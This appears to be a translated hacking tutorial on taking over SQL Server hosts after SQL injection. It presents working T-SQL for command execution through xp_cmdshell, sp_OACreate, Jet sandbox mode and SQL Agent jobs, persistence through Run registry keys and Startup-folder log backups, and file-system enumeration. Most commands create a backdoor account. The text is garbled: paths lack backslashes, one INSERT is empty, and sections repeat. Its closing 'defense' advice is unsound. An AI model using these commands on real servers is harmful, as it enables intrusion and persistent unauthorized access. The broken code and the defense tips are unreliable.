SQL Server is a database widely used by small and medium-sized websites. Due to its powerful functions, it has also caused many security problems. SQL injection attacks have been popular in China for a long time, resulting in an endless stream of intrusion techniques for SQL Server. Since SQL Server supports multiple statements , I believe that many hackers rarely use methods such as guessing table names when injecting SQL into SQL Server, but directly turn to using SQL Server's stored procedures and functions to quickly obtain permissions. Below I will focus on the SQL Server system. Stored procedures and functions to introduce these hacks.
1. Execute system commands
Using stored procedures, we can quickly and easily obtain a shell, such as executing system commands. The storage extension call is as follows:
exec master..xp_cmdshell 'net user ray ray /add'
xp_cmdshell is a system command stored procedure that comes with SQL Server. By default, only the SYSADMIN server role can execute it.
Using the OLE object interface, SQL SERVER provides some functions to access OLE objects, namely sp_OACREATE and sp_OAMethod. You can use them to call OLE controls and indirectly obtain a shell. Use SP_OAcreate to call object wscript. shell is assigned to the variable @shell, and then uses SP_OAMETHOD to call the attribute run of @shell to execute the command.
DECLARE @shell INT
EXEC SP_OAcreate 'wscript.shell',@shell out
EXEC SP_OAMETHOD @shell,'run',null, 'net user ray ray /add'
Turn on the sandbox mode of access. By default, the Jet data engine does not support SQL statements such as select shell ("net user ray ray /add"). However, after turning on the sandbox mode of the JET engine, you can execute commands. First use The xp_regwrite stored procedure rewrites the registry, then uses OpenRowSet to access an ACCESS database file that comes with the system itself, and then executes the SQL statement to run the command.
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWareMicrosoftJet4.0 Engines','SandBoxMode','REG_DWORD',0
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:windowssystem32iasias.mdb','select shell("net user ray ray /add")');
In addition to these, you can also use SQL Agent to execute commands. Of course, you must first open the SQL Agent service. This service is closed by default. We can first use xp_servicecontrol to open SQLSERVERAGENT, then create a SQL scheduled task, and then run the task immediately.
exec master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT'
use msdb exec sp_delete_job null,'x'
exec sp_add_job 'x'
exec sp_add_jobstep Null,'x',Null,'1','CMDEXEC','cmd /c Dir C:'
exec sp_add_jobserver Null,'x',@@servername exec sp_start_job 'x'
[Cut-Page]
2. Write arbitrary files to execute commands
Use xp_regwrite to write the registry entry and directly write the command to be executed into the RUN startup entry.
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftWindowscurrentversionrun','shell','REG_SZ','C:windowssystem32cmd.exe /c net user ray ray /add'
Backup logs to startup items
We can enable the full recovery mode of a database, then create a new table, insert the command to be backed up into the log, and finally back up the log into a batch file to the user startup folder. This file will be run after the machine restarts.
alter database msdb set RECOVERY FULL--
create table cmd (a image)--
backup log msdb to disk = 'c:cmd1' with init--
insert into cmd (a) values ()--
backup log ISTO to disk = 'C:Documents and SettingsAll Users"Start" MenuProgramsStartup1.bat'--
drop table cmd--
3. Users with arbitrary permissions can execute commands
In a server role with any permissions, we can use the OPENROWSET macro to execute commands as long as we know the account and password of the server's SYSADMIN role.
select * from OPENROWSET('SQLoledb','uid=sa;pwd=admin;Address=127.0.0.1,7788;','set fmtonly off exec master..xp_cmdshell ''dir c:''')
[Cut-Page]
4. Other acquisition of system information
Traverse directory
exec master.dbo.xp_dirtree 'c:'
Get subdirectory
exec master.dbo.xp_subdirs 'c:'
List available system partitions
exec master.dbo.xp_availablemedia
Determine whether a directory or file exists
exec master..xp_fileexist 'c:boot.ini'
5. There are ways to defend against SQL injection
1. Modify the table structure. Modify the data type of the administrator's account field, changing the text type to the maximum field of 255 (actually enough, if you want to make it larger, you can choose the note type), and set the password field in the same way.
2. Modify the table. Set the account with administrator rights in ID1, and enter a large number of Chinese characters, preferably more than 100 characters.
3. Put the real administrator password in any position after ID2.
We completed the modification of the database through the above three steps.
Is the modification completed at this time? In fact, it is not the case. You must understand that the ID1 account you made is actually an account with real permissions. Now the computer processing speed is so fast. If you encounter a software that must calculate it, this is not correct. Safe. I think most people have already thought of a way. Yes, just write the character limit in the administrator login page file! Even if the other party uses this account password with thousands of characters, it will be blocked, and the real Passwords can be unrestricted.
[Cut-Page]2. Write arbitrary files to execute commands
Use xp_regwrite to write the registry entry and directly write the command to be executed into the RUN startup entry.
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftWindowscurrentversionrun','shell','REG_SZ','C:windowssystem32cmd.exe /c net user ray ray /add'
Backup logs to startup items
We can enable the full recovery mode of a database, then create a new table, insert the command to be backed up into the log, and finally back up the log into a batch file to the user startup folder. This file will be run after the machine restarts.
alter database msdb set RECOVERY FULL--
create table cmd (a image)--
backup log msdb to disk = 'c:cmd1' with init--
insert into cmd (a) values ()--
backup log ISTO to disk = 'C:Documents and SettingsAll Users"Start" MenuProgramsStartup1.bat'--
drop table cmd--
3. Users with arbitrary permissions can execute commands
In a server role with any permissions, we can use the OPENROWSET macro to execute commands as long as we know the account and password of the server's SYSADMIN role.
select * from OPENROWSET('SQLoledb','uid=sa;pwd=admin;Address=127.0.0.1,7788;','set fmtonly off exec master..xp_cmdshell ''dir c:''')
